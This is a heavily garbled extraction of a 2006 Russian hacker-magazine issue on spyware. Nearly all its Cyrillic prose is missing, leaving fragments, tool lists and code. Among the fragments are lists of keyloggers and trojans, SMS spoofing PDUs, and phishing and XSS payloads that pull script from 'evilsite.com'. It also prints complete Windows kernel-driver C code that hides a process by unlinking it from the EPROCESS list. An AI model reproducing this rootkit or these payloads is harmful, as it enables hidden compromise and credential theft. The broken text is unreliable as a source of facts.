
09 70 2006

SPYWARE
34
40
52

, .
( ,

SYNC

:)

www.totalfootball.ru

-2006:
5 2006

37

Maxi Tuning

Total DVD

DVD

Total Football

Onboard

Mountain Bike
Action

8-495-780-88-29 ( )
8-800-200-3-999 ( )

9 18

intro
!

.


,

. ,
.
,
.
, , .

BHO.
! , .

. ! ,
.
-
, ?
?
,
,
! ?
! ,
.NET .

09|70|2006
WWW.XAKEP.RU

.
.
,
, .
.


AvaLANche (avalanche@real.xakep.ru)

Dr.Klouniz (alexander@real.xakep.ru)
(andrusha@real.xakep.ru)
CD/OFFTOPIC
SkyWriter (sky@real.xakep.ru)


-
(vasin@real.xakep.ru)

(zhukova@real.xakep.ru)

12

18

24

28

30

34

40

46

52

56

O

(igor@gameland.ru)

(olga@gameland.ru)

E (olgaeml@gameland.ru)
(goryacheva@gameland.ru)
(alekhina@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24


(vladimir@gameland.ru)

(andrey@gameland.ru)

(popov@gameland.ru)

(kosheleva@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24



(nahalova@gameland.ru)
.: (495) 935.70.34 (. 454)


sms


spyware

spyware bho

60

68

72

76

80

82

84

88



(dmitri@gameland.ru)

(shostak@gameland.ru)

(romanovski@gameland.ru)

(stepanovm@gameland.ru)

(dianova@gameland.ru)

(boris@gameland.ru)

(sidorovsky@gameland.ru)

.: 8 (800) 200-3-999

101000, , , / 652,
spec@real.xakep.ru
ScanWeb,

,

77-12014 4 2002 .
42 000 .
.


anti-spi.info

spyware

SPECIAL DELIVERY
SPECIAL

SPECIAL

SPECIAL

SPECIAL FAQ

AVZ
(
)

offtopic

88

82

80

82

HARD
LCD 20+

- 20

, !
Zyxel P-660RU E

SOFT
NONAME

nnm.ru

. 2

86

88

95

CREW
E-

STORY

09(70) 2006

MULTIBOOTABLE

NoNaMe
:
Norton Internet Security 2006
Kaspersky Anti-Virus 6.0
Widestep Elite Keylogger v3.0

cd :

Windows
(9x/XP/NT/2000/2003)
07(68),

.
.
: ,
!
.
.

Actual Spy 2.8


BO2K 1.1.3 (core)
Blowfish BO2K
Ricq BO2K
Mobile Access Control 4.0 Pro
Remote Administrator 2.2
TightVNC 1.3dev7
Sub7 2.1.5
Family Key Logger v2.83
Personal Desktop Spy v2.10
Golden Keylogger v1.32
Give Me Too v2.46
Personal Inspector v5.00
SpyArsenal Print Monitor Pro
Quick Keylogger v2.1
Handy Keylogger v3.25.032
Widestep Elite Keylogger v3.0

Anti-Spy.Info 1.6
Advanced Anti Keylogger v3.7 (Lite)
Anti-keylogger v7.3
PrivacyKeyboard v7.3
Trend Micro Anti-Spyware 3.0
DrWeb 4.33
Ad-Aware SE Pro
Kaspersky AntiVirus Symbian (Nokia)
Microsoft Windows Defender Beta
Norton AntiVirus 2007 Beta
Norton Internet Security 2006
Kaspersky Anti-Virus 6.0
Kaspersky Internet Security 6.0
AVZ 4.19
Agnitum Outpost Firewall Pro 3.51
ZoneLabs ZoneAlarm 6.5.731 (Free/Pro)
ZoneLabs Internet Security Suite

IceExt 0.70
COBA PC
PE Tools v1.5.400.2003 Xmas Edition
TheBat! Pro v3.80 (+help)
SDTrestore v0.2
Wasm.Ru
icedump 6.026 & nticedump 1.14
Process Explorer v10.2
GetDataBack NTFS

NONAME
Chat Watch v4.4.5
HDD Regenerator v1.51
McFunSoft Video Convert Master 6.3
Online Armor v1.1.1.826
Sunbelt Network Security
Inspector v1.6.57.0
Keyboard Maniac 4.2
NeuroSolutions v5.03 Developer Edition
Amor SWF to Video Converter 2.3.8
Secure iNet Factory v5.8 for Java
php2exe
Fresh Diagnose v7.38
AVG Free Edition 7.1.405
PIMone Ver 5.1 Build:2006.7.4.145

, ?
TOTAL DVD!
,
,

DVD , 50 ,

... !
, !

Total DVD !
DVD-
(
),
DVD-.

?
DVD - !
Hi-Fi, High End Home Cinema!



.
50
, ,
!

DVD !
, , , !
DVD-
(
)
.

timeline

andrusha@real.xakep.ru

1986

1994

, .

.


,
.

OneHalf . MBR , INT 13h, 1Ch, 21h COM- EXE- . ,



.
.
,
..
, :
Disk is one half. Press any key to continue ...

1995
Word.Concept,
6- Worde Windows 3.1.
Windows 95 DOS-, ,
Microsoft
.

. , -

. ,
. ,
Visual Basic for Application (VBA).
Windows- ,
.

1998
Win32.CIH ,
26 ,
.
1 , . Windows
95/98 :
, ,
Flash BIOS
. , , - ,
.
,

CD
, .

1999

2000

Back Orifice () Cult of the Dead Cow


.

. ,

.
.
,
, .
- 125 . Back
Orifice , . windows\system\ .
, , , BO2k SDK.


.


ILOVEYOU.
VBS- ( ).
,
.
, .
, .
, .
,

.

2004
,
E-mail fraud. ,
.
,


, , ,
,

2006
.
, ( ).

. , ,
.

20
. , 20 ,
99% .
.
Windows
- , , .

8 / 33

18

28

12

24

30



,
, .
! . ,
.

alukatsk@cisco.com
, , .
. , RFID-
,
RFID-.
, -
, .
,
?
, ,
, .

, -

.
, , ,
, , - .
,

, ,
(Wi-Fi, WiMAX, RFID ..), IP- ..

.
,

10 09- 06

,
. ,
,
. ,
, ,
.
SOAP, XML .. , . , -,
,
...
c
, ,
,
. ,
. , .
, , , , PowerPoint, Acrobat Reader,
..
. ,
, -

,
.
, 1000 15 ( - 150000-250000 ).
75 ,
6 .
, , .
.
,
6 .
,

.

.
. ,
, ,
15 .
24


, ,
. , ,
.

, .
C : , ,

: -

( ), -

, -

, -

, -

, ,

spyware. ,
( ).
,
spyware ( ). ,
spyware.
, Instant Messaging
(, ICQ Mirabilis), P2P (, Kazaa eDonkey), web- .. ,
spyware.

. , , .
:
(, , ) . , ,

,

.
,

: , -

,
, ( ), ,
.

,
. , ,
, . ,

:
(
), ( ), , - (********),
..
,
(, ,
, ..):
. , .

(www.freescan.ru).
, -, e-mail. , . ,
.


, .
, , ,
, , . 2005 ,
(www.ifap.ru/as/050524d1.pdf).
. , ,
,


.
?
, . . ,
, ,


. ,
. , . .

? .
, , : , ..
, , Cisco Service Control Engine. , ,
, .
, , , ,
. , , , . ,
Mirapoint Radicati Group, 11% , . ,
. , .
DNS .
, spyware- , , DNS.
- , DNS, IP-.
, , , . , ,
, , .
,

( ),
.
( , ) ,
.
:
, ,

.

. DoS-,
,
DoS- .
,
, , . -

- ,
.
,

,
, IRC- ..
:
,
, .

.
, .

, , ,
..
. , .
, ,
.

, , .
- , , iPod,
.
,
.

IP- ( SIP
H.323), RFID, SOA, XML, SOAP . , , ,
.
,
.
. , .
(, IPS, , ..). ,
( ,
..) ,
, . ? ,
. 30-50 ,
. ,

.
,

. ,
(
) 15 !
4 ,
.

,
, ,
.
5- ,

.
, . ,
, , (-

14400 , 7-
ADSL-).
- . , 2-3 (
).



. , , . , , .
, , ,

www.ifap.ru/as/050524d1.pdf


www.kaspersky.ru/removaltools

,
www.spamcop.net
-
,

www.antispam.ru
...
: , ,




,
.

.

. ,
.
, ,
. ,
,

aka razy_script
crazy_script@vr-online.ru

. ?
: , , ,
, . SpyWare
:
, , ,
.


, .
,
,
.


GORL


,
.
? ,
, , , ...



. ,
,

( , ,
). -


. , , ,




. TAN'
.
,
-,

http-
, ,
TAN',
.
.
-

. ?
,
,
Outlook
-
The Bat! 3.5.


,
( ) .

, -

, ,
, , , , .
?
!


.
.
, ,
40
.

- .


-

, , , , ,
.

, .

?
?

, . -

,
,
- ,



. , . -

? ,
? , - ?

. ( )

(
, ).


.
, 23 -

,
(
, ,
, ),
$50 .


3/5
Midday
Sausages 1.0
rootkit
free
http://rst.void.ru


.
RusH Security Team
, ,

.
30 ,
unix-.


(midday_sausages.txt).

IKS (Invisible Keylogger
Stealth).

.

iks.reg,

. :
DisplayName ( , ),
LogName (
).


-.
.
readme (
)
.



enum Razor.

:
,



- .
-D -u <login>
-f <file_passwd>
.

nete
Cult Death Cow.
.
-, , , .

8 ( 2.7 ).
-, . attrib
+h. ,
, .


: rst.void.ru.

4/5
CIA 1.3
rat
freeware
www.cruel-intentionz.com


,
VB
Alchemist. , ,
,
, :).
mew by Northfox (northfox.uw.hu)

. open source
LZMA (
7-Zip).
(ASPack, PECom2,
UPX),
.


mew
PeiD MEW
www.team-x.ru.

- ,


,

.

(Build Server 
Binder). ,


.
CIA . -


(
socks)

.

:). -,
,

VB.

, ,
. , . 100
, 5

.
, ,
,

.
CIA ...
,

(
2 )

PE. ,
.
.
, ?
.
(
) (Build
Server  Firewall Killing).

-
500 .

4/5
Penumbra 1.7.2
trojan
freeware
www.yzkzero.yeah.net

4/5
KGB KeySpy 2.0
keylogger
freeware
www.ya.ru :)




. ,

Windows
Task Manager: Process
Explorer
.


.

,
, , :

370Kb.

,


:
, , ,
,
explorer'a
winrar'.

, ,
CIA,
.

,

. (

),

.

Blacklogic.


. 2005

.
,
, ,
,
. , 2
.

-

: smtp-, , .
9- .
,
-
,

, '
.
,
(unpack*.exe).


5/5
Illusion
Security Bot
backdoor
private ($400)
www.illusion.cup.su




irc, web.


,
.

:
, , ,
.

, ,
. .



,

(, ),
.

.
,

. -

,
(
!), , . ,
: SYN,
ICMP ( IP, ),
UDP, HTTP GET ,
!
,
irc
.


!login [passwd].

md5crypt.

.
,
nick!ident@address irc
. ,

, ..
ident address .
,
.
:
, ,
.
,
- .

3/5
Pinch 2 Pro
trojan
shareware
www.pinch3.ru
www.xroot.hut1.ru


coban2k, ICQ, , ,

(XS11(48)). , .

? -,
,
,

2.58.
2.95 . -, ,
, .

: ,
Far'
TotalCmd. ,
smtp- http.
:


smtp,
firewall. , . ,
,
www.xakep.ru/post/23566/.

IRC.
.
.

fall back! , , . , , ,
.

www3.ca.com/securityadvisor/pest
Spyware
www.research.sunbelt-s
software.com

www.simovits.com/trojans
-
CD
Illusion Security Bot

.

.



SMS
PEPSI-COLA NEXT
SMS.
,
, SMS-


alukatsk@cisco.com
, .
, ,
. SMS .
SMS. 3 :
.
(E-MAIL, WEB, SKYPE ..).
ESME
(EXTERNAL SHORT MESSAGE ENTITY)
SMS-,



,
(,
)

.

,
SMS (SMS Centre, SMSC),
(
,
).
,
SMS-
. ,
,
HLR (Home Location Register).

, .
(Mobile Switching Center, MSC), . SMS- MSC
, VLR (Visitor Location Register) -

HLR, () . , MSC (base station,


BS), , , .
, .
, , .
. ,
SMS , ?

,
. , . IS-41 (ANSI-41)
, ANSI-136
AMPS IS-95 CDMA. GSM-
MAP (Mobile Application
Part).
. MAP,
, 7 (SS7),
, SMS.
TCAP (Transaction Capabilities Application Part), , ,
SCCP MTP. Signaling Connection and Control Part (SCCP)
SMS . ( , ) . MTP , .

SMS-
3 1992
VODAFONE


ESME SMSC
IP, SMS 7.
IP- 7 Signaling Transfer Point (STP),
, IP-.
SMSC 5- :
SMPP (SHORT MESSAGE PEER-TO-PEER)


.
5.0,
3.4
( 4
).
EMI/UCP (EXTERNAL MACHINE
INTERFACE/UNIVERSAL COMPUTER
PROTOCOL)
LOGICACMG, ETSI UCP.
CIMD2 (COMPUTER INTERFACE
TO MESSAGE DISTRIBUTION)
NOKIA.
OIS (OPEN INTERFACE SPECIFICATION)
SEMA GROUP
( SCHLUMBERGERSEMA).
TAP (TELOCATOR ALPHANUMERIC
PROTOCOL) ,
SMS-
.

SMSC ,

. SMSC Comverse, Nokia,
Unisys, Airwide, Jinny, Motorola .
, , LogicaCMG ( Logica CMG).
SMS. , SMS
,
. , (ringtone)
/.
160 ( 7- ). , , 70 . , . 8- , 140 .
. , , TFTP, -

.
.
Over-the-air programming (OTA), over-the-air service
provisioning (OTASP) over-the-air parameter administration (OTAPA).
, .
( SMS)

.
. :

ESME;
SMS-;
SMS-DOS;
SMS-.

ESME. SMS
SMSC , :
1

WEB-SMS.

2
SMSC
(, SMPP).

- ESME ,

( ESME, ..).
web, ,
SMS.
, ( ). 2 SMS
, .
( SMPP-) SMSC - ,
System-ID, System-Password, System-Type -.
, . SMS- -, . , - , .

. ,
.
. ,
VIP-, .
:
WEB-

APPLICATION FIREWALL,

,
WEB-.

IP- ESME.

SMSC-ESME
.

SMSC ESME.

-.


.
,
,
ESME
.
, ..


,

SLA

.

SMS-
. SMS-
. , . , ( SMS ) .
? .
, 100000 SMS-
10350 . 103500 .
.
,
:


15 ;
2
;
5%

;


7 .

... 63
!
, , .. 4 SMS-:
SPAMMING

. ,





,

.
?. ,
,

,

SMS.

.
(, MOTOROLA)
AUTOREAD,


.
,
, , SMS
,
.
FLOODING
SMS-

.


,
SMS -
,
.
FAKING SMS
SMS-.
-


.
SPOOFING
SMS-,


,
,
.

SMS-? . -,
web-. -, SMSC
, ,
SMPP.
SMPP ,
PDU (protocol data units).
PDU :
'service_type', () ... 00
'source_addr_ton', (2) ... 02
'source_addr_npi', (8) ... 08
'source_addr', (555) ... 35 35 35 00
'dest_addr_ton', (1) ... 01
'dest_addr_npi', (1) ... 01
'dest_addr', (555555555) ... 35 35 35 35 35 35 35 35 35 00
'esm_class', (0) ... 00
'protocol_id', (0) ... 00
'priority_flag', (0) ... 00
'schedule_delivery_time', () ... 00
'validity_period', () ... 00
'registered_delivery', (0) ... 00
'replace_if_present_flag', (0) ... 00
'data_coding', (0) ... 00
'sm_default_msg_id', (0) ... 00
'sm_length', (5) ... 0F
'short_message', (Hello) ... 48 65 6C 6C 6F

source_addr
. SMSC , . , 7, , , 7. , - .
, (,
SMPP , ,
Delphi), . Google
SMS Spoof Palm OS (

EMI/UCP) www.smsspoofing.com, -


SMS (
PayPal, 170 ).
:
,
, .

.
SMSC
STP

/

( ESME, MAP/SCCP-).

,
, .
, SLIMIT-C
NEC

,

,
.
URL .

SMS-.

NTT DOCOMO,


100
.

.
BELL CANADA


SMPP- ESME.
, ,
ESME-

SMS ,

40-50 SMS .
,

DOS-,

,
.

(
SMPP)
SMS-, . , (-


, ), SMS
SMSC, MSC ,
SMSC, . 7.
.
7.
STP (,
Cisco ITP) . LogicaCMG, Openmind Networks, eServ Global Ferma SAS (SMS Anti-Spam Screening).
SAS
SMS , , .
:

;
;
IMSI ;

;
;
/ .

DoS. , ,
SMS DoS'
, SMSC.
,
Exploiting Open Functionality in SMS-Capable Cellular Networks
. - , , - ,
,
( ).
:
SMSC. ,
SMSC , SMSC .
, . Ping
of Death ( ICMP,

IP- 64 ),
SMSC . SMS-,
SMSC, .
,
SMS' , SMSC .
, SMS
,

SMS- . ,
hello 66677789
EMI/UCP : ^B01/00045/O/30/66677789///1//////68656C6C6F/CE^C.
(00045) .
SMSC , . ,
(O
, R )
(, 30 ).
SMSC.

, . ,
Nokia, . DoS- , , 25
44- 13- .
, .
SMS-

SMSC, , .
.
SMS-
DoS- SMSC. ,
IP-, .
DoS DDoS-, .
, , OTA,
. SMSC, (,
SMSC).
, -
, .
SMS-
. SMS- , , .
, SMS-
.
,
SMS
. Cabir, -

Bluetooth, Symbian. Duts, Brador...



( , Symbian, Windows CE/Mobile). .
Comwarrior,
Bluetooth, MMS,
, . -, , SMS SMS-
( ,
OTA-), .
Symbian
MMS, SMS
, .
SMS , DoS ..
, .
SMS ESME 7 . , 7, . SMS .
, SMS-
( )
( ).
,
.

.
, ,
,
.
,
, .
SMS-
SMS-,
. ,
, IP-
(
IP-). , , , .

Yes SMS-. ?
www.smsspoofing.com
sms 170



SPYWARE
SPYWARE ,
,

, ,

alukatsk@cisco.com
Spyware .
Webroot, 9 10 , , , 86% . Gartner, 20%
40% (
)
spyware.
spyware, Microsoft, .. . , -


, , , Sony Extended Copy Protection.

SPYWARE . , , 1


.


,

?

.



.
SPYWARE
-
.
FREEWARE SHAREWARE
,


,


SPYWARE.
, :
DIVX, FLASHGET, EDONKEY 2000, ICQ
..


. ,
, SPYWARE

.





,
POPUP' ..
SPYWARE



.


,

,
.

SPYWARE,
SHAREWARE/FREEWARE
,
.
2


WEB-,


3

.

INTERNET EXPLORER,


WINDOWS
.

,

.
4
. ,
SPYWARE


?

?.
( ) .

, BROWSER HELPER
OBJECTS (BHO). DLL-,
1997
INTERNET EXPLORER

.
BHO
,
PDF',
ACROBAT READER,

YANDEX.TOOLBAR GOOGLE.
DESKTOP ..


. ,

DOWNLOAD.JECT

HTTPS ,

(
)

.

BROWSER HELPER OBJECTS
.

.

. ,
spyware Dialer DUN (DialUp Networking) ,
,
. ,
,


. Dialer , .
web-,
.
,
, .
( adware)
( , URL),
. ,
pornware. Annoyware
adware,
. -.
adware , ,
,
. ,
,
.
, adware . . , adware ( )
,

Internet Explorer.
(, CoolWebSearch
Download.ject) , , PIN, ..
keylogger ,
. (,

)
, ,
PIN-, .
, Hijacker, ,
(home page), , HOSTS, . , Internet Optimizer ( DyFuCa)


.
, stealware ( click fraud, affiliate fraud).
spyware (, 180 Solutions). ,
. , ,
spyware ( CoolWebSearch HuntBar) , ,
..
. , spyware.
. -

spyware. ,

(RealSecure Desktop). -

spyware

( ,
). , , - ( , , ),
.

.
spyware ( ), (
). Targetsoft
Winsock (inetadpt.dll),

. , ,
. spyware

.
,
. , W32.Spybot
spyware.
. (spyware)
, .
(, ) spyware . .
, , , . 70% , . , . spyware
,
http://msdn.microsoft.com/library/default.asp?url=
/library/en-u
us/dnwebgen/html/bho.asp
BHO


,

MICROSOFT WINDOWS ( )
noname

, , ,
, , - . , -
:
.


, c.
: 40% - .
Caterpillar, CNN, eBay Microsoft. - . () - 2005 538%.
, - .
,
,
. - . -
-.
-

. - .
- . 250000 , .
, - 7% , 47 681
. McAfee,
2005 28 -
, 2004 . 197 ,
-...
. .
1 . -, , ,

.
-

. .
2 .
.
,
. , , P2P- .
3 .
. , , , ,
.

,
.
, ,


.
IP- , .
, CodeRed, Mydoom
Sql Slammer . - . -20 , , 30%

- (MYTOB, BKDR_IRCBOT,
PERL_SHELLBOT ).
. - IRC- P2P.
- IRC (Internet
Relay Chat). -,
- . IRC-
, IRC-, , .
- . IRC- IRC- .

IRC- 6667 (
,
IRC),
, .
IRC , ,
, .
-
.
IRC.

-
DDoS
,
100$ DDoS-,
- 10000
(www.spamdailynews.com/publish/Organized_crime_offers_rent-a-zombie_deals.asp).
,

FTC (
),
4800$

250000 ,

( , #TESTING). ,

-.
,
,
.
-
.
. -
. -
30, 50 . -
(Phatbot), 400 (!) .
-?
- 1000 128 /, ,
100 /.
-
.
50000 50
/ 300 /.
, -

, 445
135 tcp-. ,
-.
- ,
( ). -

500$
(www.ftc.gov/opa/2003/09/idtheft.htm).

, . , ,
. , , (, ). .
-
- 100 200$ (

- .
1 DDoS-.
, -.
ICMP SYN- ,
http ftp- . ,
DDoS-,
: , , .. DDoS-
: - .
2 SMTP relay.
SOCKS proxy ,
- ( ).
. , -,
,
.
3 . - , , (clear-text data)
. ,

. ,
. ,
, .

150000 ). IP-,
,
.

- dial-up
.
DDoS, , , .

- ,

.


$150 1000 . 1000
html- ( ). ,


.


, , ,
,
.
, 95%
-
NONAME


, ,
,
,
, .
-
, .. , , , ,
, , ,
.

,
. E ,
-, n-
- , , , 2

. , IRC, - -.
.
. ,

.
,
.
,

, DNS-.
.
-, -

? , :
.

, 48
.
,
.

, , , - . - -



, ..
. ,
-
, , .
:
. ,
,

(
).

.

.



.

: DNSChanger.eg.
-.
, , jpmorgan.com, ,
IP-, ,
192.220.34.11. ,

IP-. URL, web-.

.
IRC -
. IRC - (IM)

.
IRC IM-
(, URL- ..), ,
- .
. ,

, .
.
.
,
, . :

.
URL.
CROSS-SITE SCRIPTING.

.
.
1 . ,

-, . -, . http,
https-. - , .
HTTPS ( SSL) ,
, ,
, SSL- .

, :

.
,

.
DNS-.
DNS
,

IP-
.
URL. URL,

. ,
WHITEHOUSE.GOV .COM
.

( MICRO, MICO, MICOR...).
.
.

PAC-
WPAD (WEB PROXY
AUTODISCOVERY PROTOCOL).


-.

2 URL. , , ,
.
.
-
:

HTTP://PRIVATEBANKING.MYBANK.COM.CH
HTTP://MYBANK.PRIVATEBANKING.COM
HTTP://PRIVATEBANKING.MYBONK.COM
HTTP://PRIVATEBANKING.
MYBANK.HACKPROOF.COM

3 Cross-site scripting. cross-site scripting


(CSS) -. , .
CSS :

HTML (
): HTTP://MYBANK.COM/EBANKING?URL=HTTP://EVILSITE.COM/PHISHING/FAKEPAGE.HTM.
URL: HTTP://MYBANK.COM/EBANKING?PAGE=1&CLIENT=<SCRIPT>EVILCODE...
: HTTP://MYBANK.COM/EBANKING?PAGE=1&RESPONSE=EVILSITE.COM%21EVILCODE.JS&GO=2.

,
.
-
- .
4 . http- .
-, ,
cookies,
, URL.
- .
, - ,
. ,
,
, -


(, 404 File Not Found, 302 Server Redirect


..). ,
,
() .
.
5 .

. dhtml- DIV.
( ) .
6 Screen grabbing.
-.
key-logging .
7
. . ,
From .
, - :
<a href= http://fakesite.com>https://genuinesite.com</a>.
https://genuinesite.com, , , http://fakesite.com.

Internet Explorer. .

-


EBAY, PAYPAL CITIBANK.
. , SPEAR PHISHING,
: - ,
.. , : , ..
.

, , http://www.genuinesite.com%01%00@fakesite.com/,
:
http://www.genuinesite.com. . , %01 %00.
8 . - , ,
, .
, , ,
. ,

, .

- , , , , , .
9 .
https.
(Internet Explorer).
1 0 . , .
. ,
www.paypal.com www.paypal.com www.verify-paypal.com.
, .
1 1 . ,
,
, .
, ,
. , .
1 2 .

, ,

- , spyware
. ,
,
,
.

URL-

? ,
, . -,
, , . ,
SSL (https://).
, , , . -

,
-
.
,
.
,
,
, .
, ,
-, . ,
,
, IP . , -. , Internet Explorer 7 Mozilla Firefox 2 ,


EBAY, PAYPAL
CITIBANK

!
GamePost

Final Fantasy XI:


The Vana'diel
Collection
(US Version)

Lineage II
Collector's DVD
Edition (US)

Elder Scrolls IV
Oblivion Collector's
Edition

$69.99

$99.99

$99.99

Diablo Action
Figure:

Necromancer

$42.99

* * *

34 / 59
34

40

52

46

56

,


. -
. ,
,

http://www.z-oleg.com/secur/
.
, . , , :
.
MS DOS

. ,

- ( .
Stealth ). ,
: (
) ? :
. MS
DOS API-
, :
1 ,
.
2 .
, , .
.

UserMode . UserMode , , .
, , .
, Win9x NT, . (
). , UserMode :
,

.
,


.
.

API-.


DLL

, API

Rootkit
Kernel32.dll
LoadLibrary
GetProcAddress

DLL

, API

Rootkit
Kernel32.dll
LoadLibrary
GetProcAddress

, API

,

.
, API- . , , ,
. ,
.

, . ,
.

. , PE
, . ,
,
.
.
.


.
LoadLibrary GetProcAddress
kernel32.dll , .
UserMode- , . , , , ,
-.
,

. ,
,
- (
, ..). .
, API-
. : .
JMP .

:
1 .
,

( , )
. 5 , EB
xx xx xx xx JMP.
, ,
. ,
.
2 . , . ,
, . JMP
API-, PAGE_EXECUTE_READWRITE, . API-
,
, , , .
, .
, . -


Kernel32.dll

ntdll.dll

INT2Eh

STD
ntoskrnl.exe

hal.dll

bootvid.dll

Kernel-mode


.
3 . , . ,
. , .
KernelMode
( 5-10 UserMode
KernelMode),
. .
, :
1 KiST. , KiST
. KiST SDT,
, .

Windows
2000.
2 .
UserMode.
3 INT 2E sysenter.

, .
4 -.
IRP
.
( Ring0) KernelMode UserMode .
DKOM, . DKOM- (DKOM
Direct Kernel Object Manipulation)
, . ,
,
.
DKOM- FU-
.

. ,
EPROCESS.
Flink BLink,
, .
EPROCESS Windows,
, - .
: WinDBG.

#include <ntddk.h>

// Offsets inside EPROCESS, selected by kernel build number in DriverEntry
ULONG ActiveProcessLinkOffset;
ULONG PIDOffset;

NTSTATUS DispatchCreateCloseControl(PDEVICE_OBJECT pDeviceObject, PIRP pIrp);
VOID HideProcessByPID(int PID);
VOID DriverUnload(PDRIVER_OBJECT pDriverObject);

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pusRegistryPath)
{
    PDEVICE_OBJECT DeviceObject = NULL;
    NTSTATUS ntStatus;
    UNICODE_STRING usDeviceNameUnicodeString;
    UNICODE_STRING usDeviceLinkUnicodeString;

    // Select the EPROCESS offsets by the kernel build number
    switch (*NtBuildNumber) {
    case 2195: // Win 2k
        ActiveProcessLinkOffset = 0xA0;
        PIDOffset = 0x09C;
        break;
    case 2600: // Win XP
        ActiveProcessLinkOffset = 0x88;
        PIDOffset = 0x084;
        break;
    case 3790: // W2K3
        ActiveProcessLinkOffset = 0x98;
        PIDOffset = 0x094;
        break;
    default:
        return STATUS_NOT_IMPLEMENTED;
    }

    // Initialise the Unicode strings holding the device and symbolic link names
    RtlInitUnicodeString(&usDeviceNameUnicodeString, L"\\Device\\DKOM_Demo");
    RtlInitUnicodeString(&usDeviceLinkUnicodeString, L"\\DosDevices\\DKOM_DemoLink");

    // Create the device object
    ntStatus = IoCreateDevice(pDriverObject, sizeof(DEVICE_OBJECT),
                              &usDeviceNameUnicodeString, FILE_DEVICE_UNKNOWN,
                              0, TRUE, &DeviceObject);
    if (!NT_SUCCESS(ntStatus)) {
        return STATUS_UNSUCCESSFUL;
    }

    // Create the symbolic link through which user mode opens the device
    ntStatus = IoCreateSymbolicLink(&usDeviceLinkUnicodeString, &usDeviceNameUnicodeString);
    if (!NT_SUCCESS(ntStatus)) {
        IoDeleteDevice(DeviceObject);
        return STATUS_UNSUCCESSFUL;
    }

    // Route CREATE/CLOSE/CLEANUP requests to a single dispatch routine
    pDriverObject->MajorFunction[IRP_MJ_CLEANUP] =
    pDriverObject->MajorFunction[IRP_MJ_CREATE] =
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DispatchCreateCloseControl;

    // Register the unload routine
    pDriverObject->DriverUnload = DriverUnload;

    return STATUS_SUCCESS;
}
, : ActiveProcessLinkOffset PIDOffset. ActiveProcessLinkOffset
EPROCESS / , PIDOffset -


, PID .
, ,
,
.
.

. . ,
, IRP_MJ_CREATE,
IRP_MJ_CLOSE, IRP_MJ_CLEANUP , .

IRP_MJ_DEVICE_CONTROL .
,

IRP ,
PID.
: ,
.
:
// Dispatch routine for IRP_MJ_CREATE / IRP_MJ_CLOSE / IRP_MJ_CLEANUP
NTSTATUS DispatchCreateCloseControl(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    PIO_STACK_LOCATION pisl;

    // Current IRP stack location
    pisl = IoGetCurrentIrpStackLocation(pIrp);
    // On open, hide the calling process by its PID
    if (pisl->MajorFunction == IRP_MJ_CREATE)
        HideProcessByPID((int)(ULONG_PTR)PsGetCurrentProcessId());
    // Complete the IRP
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}
IRP_MJ_CREATE
PID
. :
VOID HideProcessByPID(int PID)
{
    KIRQL OldIRQL;
    PEPROCESS CurrentProcess;
    PLIST_ENTRY CurrentProcessAPL, ProcessAPL;
    ULONG ProcessPID;

    DbgPrint("Hide process. PID=%u", PID);
    OldIRQL = KeRaiseIrqlToDpcLevel();
    CurrentProcess = PsGetCurrentProcess();
    if (!CurrentProcess) {
        KeLowerIrql(OldIRQL);
        return;
    }
    // ActiveProcessLinks entry of the current process
    CurrentProcessAPL = (PLIST_ENTRY)((ULONG)CurrentProcess + ActiveProcessLinkOffset);
    ProcessAPL = CurrentProcessAPL;
    do {
        // Step back from the LIST_ENTRY to the EPROCESS base, then read the PID
        ProcessPID = *(PULONG)((ULONG)ProcessAPL - ActiveProcessLinkOffset + PIDOffset);
        DbgPrint("%u", ProcessPID);
        if (ProcessPID == (ULONG)PID) {
            // Unlink the entry from the doubly linked list
            ProcessAPL->Flink->Blink = ProcessAPL->Blink;
            ProcessAPL->Blink->Flink = ProcessAPL->Flink;
            DbgPrint("Process %u found and hidden", ProcessPID);
            break;
        }
        ProcessAPL = ProcessAPL->Flink;
    } while (ProcessAPL != CurrentProcessAPL);
    KeLowerIrql(OldIRQL);
}

,

EPROCESS.
, PsGetCurrentProcess() EPROCESS .
EPROCESS
EPROCESS . EPROCESS- , Flink Blink . ,
: , , , , PsGetCurrentProcess().
:
VOID HideCurrentProcess()
{
    KIRQL OldIRQL;
    PEPROCESS CurrentProcess;
    PLIST_ENTRY ProcessAPL;

    OldIRQL = KeRaiseIrqlToDpcLevel();
    CurrentProcess = PsGetCurrentProcess();
    if (!CurrentProcess) {
        KeLowerIrql(OldIRQL);
        return;
    }
    // ActiveProcessLinks entry of the current process
    ProcessAPL = (PLIST_ENTRY)((ULONG)CurrentProcess + ActiveProcessLinkOffset);
    // Unlink it from the list
    ProcessAPL->Flink->Blink = ProcessAPL->Blink;
    ProcessAPL->Blink->Flink = ProcessAPL->Flink;
    KeLowerIrql(OldIRQL);
}
: ?
!
:
1 .
PID

PID. , .
2 .
, , ,
,
csrss.exe- ,
.. ,
.
3 API. , -
. ,
-.
4 .
, BOOT,
.

Process Hunter ( Ms-Rem,
http://www.wasm.ru/pub/21/files/phunter.rar)
,
wasm.ru, DKOM-
FU Rootkit .
. , .
:
1 . .
2 -.

,
.

KiST . , .


4/5
AVZ
www.z-oleg.com/
secur/avz/
download.php
size: 1,55

AVZ ,
:
UserMode KernelMode.
, . -



KiST.
,
. :

-.

3/5
BlackLight
www.f-secure.com/
blacklight
size: 799

3/5
5/5
RootkitRevealer
www.sysinternals.com
size: 210

RootkitRevealer
www.sysinternals.com/. -

,

API.
, , RootkitRevealer . ,


, RootkitRevealer
. .

SSV
invisiblethings.org/
tools.html
size: 50

BlackLight

F-Secure
-.

http://www.f-secure.com/blacklight/, .




.


, .

SSV , Joanna Rutkowska, rootkit.com. http://invisiblethings.org,


50 , . SSV

.
.
:

,
AVZ
.



,
, ,

,

z-oleg.com/secur

()

. MSDOS 1 . -

.

.
, ,
, .
,
,

, .
.
, ( ) .
1 .
: WH_KEYBOARD.
DLL,
GUI-
. ,
GUI-.

2 WH_JOURNALRECORD.
WH_KEYBOARD ,
, , ,
DLL. ,
.
3 . ,
. , .
4 -. , , -


77%
15%
8% -

78% rootkit-
13% rootkit UserMode
